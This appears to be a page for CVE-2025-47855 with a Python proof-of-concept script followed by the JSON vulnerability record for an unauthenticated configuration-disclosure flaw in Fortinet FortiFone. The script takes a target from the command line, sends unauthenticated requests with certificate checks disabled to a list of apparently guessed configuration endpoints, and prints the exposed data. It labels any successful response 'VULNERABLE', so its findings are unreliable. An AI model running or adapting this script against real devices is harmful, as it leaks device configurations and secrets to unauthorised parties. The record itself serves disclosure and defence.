CVE-2025-47855

import requests import sys # CVE-2025-47855 PoC - FortiFone Information Disclosure # Target: Fortinet FortiFone devices # Affected: 7.0.0-7.0.1, 3.0.13-3.0.23 def exploit_fortifone(target_url): """ Exploit for CVE-2025-47855: Unauthenticated configuration disclosure """ # Common configuration endpoints that may expose sensitive data endpoints = [ '/api/v1/config', '/api/config', '/cgi/config.cgi', '/fcgi/config.fcgi', '/api/v1/system/config', '/api/v2/config/system', '/config/system', '/api/system/info' ] print(f"[*] Scanning target: {target_url}") print(f"[*] CVE-2025-47855 PoC - FortiFone Information Disclosure\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Status: {response.status_code}") print(f"[+] Content-Length: {len(response.content)}") print(f"[+] Sample data: {response.text[:500]}...") print("-" * 60) elif response.status_code == 401: print(f"[-] Protected: {endpoint} (401 Unauthorized)") else: print(f"[*] Endpoint: {endpoint} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}") print("\n[*] Scan complete. If vulnerable, configuration data was exposed.") if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} https://192.168.1.100") sys.exit(1) target = sys.argv[1] exploit_fortifone(target)

{"cve": {"id": "CVE-2025-47855", "sourceIdentifier": "[email protected]", "published": "2026-01-13T17:15:57.520", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An exposure of sensitive information to an unauthorized actor [CWE-200] vulnerability in Fortinet FortiFone 7.0.0 through 7.0.1, FortiFone 3.0.13 through 3.0.23 allows an unauthenticated attacker to obtain the device configuration via crafted HTTP or HTTPS requests."}, {"lang": "es", "value": "Una vulnerabilidad [CWE-200] de exposición de información sensible a un actor no autorizado en Fortinet FortiFone 7.0.0 hasta 7.0.1, FortiFone 3.0.13 hasta 3.0.23 permite a un atacante no autenticado obtener la configuración del dispositivo a través de solicitudes HTTP o HTTPS manipuladas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-260", "source": "[email protected]"}]}}